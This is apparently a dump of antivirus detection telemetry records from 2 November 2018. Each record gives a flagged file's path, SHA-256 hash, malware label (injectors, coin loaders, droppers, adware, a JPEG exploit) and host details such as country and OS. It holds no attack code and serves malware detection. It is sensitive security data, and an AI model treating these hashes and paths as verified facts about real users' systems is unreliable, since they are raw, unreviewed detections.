  Row(detection=Row(filename='msimg32_71adaeb3_7d45043e.dll', filepath='D:\\# Andromeda Backup\\2018-10\\Downloads\\Setup\\msimg32_71adaeb3_7d45043e.dll', filesize=5696000, name='TR/CoinLoader.JY.#M1.#R1'), hash='517be7d335a0593e425740975aacd37de9dd347a705a6862ce20b2e03ffe9622', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=346112, timestamp='2018-11-02T23:46:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016_d45d569c.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016_d45d569c.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T22:09:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='to trinh bau bttndan.exe', filepath='G:\\\xa0\\HOI NGHI 2017\\TO TRINH BAU BTTNDAN.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='671529e197693aa9b48d4480ef080e84f0cc182f3587bffbf91c6388f468d1e0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T10:05:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=18000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='52f78bf72a47bd5ca5004cd3ee8d4204e2a046db72da9a5d6dfe32f946e3ba6a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:59:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054243-16b2efe4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054243-16B2EFE4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055613-f9eac263', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055613-F9EAC263', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053248-b468808e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053248-B468808E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.972\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.972\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:13:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052814-10c878f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052814-10C878F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000075a7', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000075a7', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:50:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6a4cd07fa42811b2bda9b913ca8cf6a120f39882060facd30efd2a1af383a881.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\6A4CD07FA42811B2BDA9B913CA8CF6A120F39882060FACD30EFD2A1AF383A881.VIR', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='6a4cd07fa42811b2bda9b913ca8cf6a120f39882060facd30efd2a1af383a881', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:57:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052812-0fbd1934', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052812-0FBD1934', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053930-a3ba9b02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053930-A3BA9B02', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051840-ba9bfc28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051840-BA9BFC28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055023-28f8f629', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055023-28F8F629', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055601-f2a5487f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055601-F2A5487F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052629-d248ac13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052629-D248AC13', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053517-0ccfa892', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053517-0CCFA892', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053700-4a9c2410', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053700-4A9C2410', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055326-960d5612', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055326-960D5612', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061109-0fd431ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061109-0FD431AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055045-36751f0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055045-36751F0C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053639-3dbc9662', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053639-3DBC9662', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062003-4dfc40dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062003-4DFC40DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061639-d47c7572', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061639-D47C7572', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055635-06ee6e9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055635-06EE6E9C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060815-a7f20b27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060815-A7F20B27', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060842-b82a4f6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060842-B82A4F6B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053042-68f2645c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053042-68F2645C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052142-275a444d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052142-275A444D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052714-ed0a1938', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052714-ED0A1938', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060400-0fe0ac67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060400-0FE0AC67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060519-3f080837', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060519-3F080837', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053817-78285f87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053817-78285F87', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061642-d6305d64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061642-D6305D64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052332-6896d575', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052332-6896D575', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054839-eae723c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054839-EAE723C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-093551-e272b372', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-093551-E272B372', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='86a7b4901bb5fbbcd40d7730584acd0c814247b1160262715180ddac60d83142', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:37:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054136-eec3ed82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054136-EEC3ED82', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053730-5c2b3efb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053730-5C2B3EFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052617-cb3d4419', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052617-CB3D4419', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051354-107cb3ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051354-107CB3EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062152-8f3c0534', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062152-8F3C0534', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050837-53a0ddb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050837-53A0DDB3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062111-76604fb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062111-76604FB8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051229-dd8e633f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051229-DD8E633F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='78f947ba30f53ea42351886328646ce887fc2bc67957b384bd07e6939c9d281b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\78F947BA30F53EA42351886328646CE887FC2BC67957B384BD07E6939C9D281B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='78f947ba30f53ea42351886328646ce887fc2bc67957b384bd07e6939c9d281b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051133-bc54457d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051133-BC54457D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='package_764_xml.js.zip', filepath='S:\\dasi\\LwS\\Server\\DConcept\\HtmlHelp\\XCONCEPT_HILFE\\WHXDATA\\PACKAGE_764_XML.JS.zip', filesize=4000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='8172c85bfccbdf9b8fcf165c6ad31824535fc0ab9e28364d55d6fd67f60572d8', metadata=Row(cmdline='C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\PersBackup\\\\\\\\dasi.buj \\\\\\/force \\\\\\/speed:fast \\\\\\/mode:full', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Personal Backup 5\\Persbackup.exe', parentsize=10769920, timestamp='2018-11-02T01:06:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052644-db44bb57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052644-DB44BB57', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:43Z'), dt=datetime.date(2018, 11, 2)),
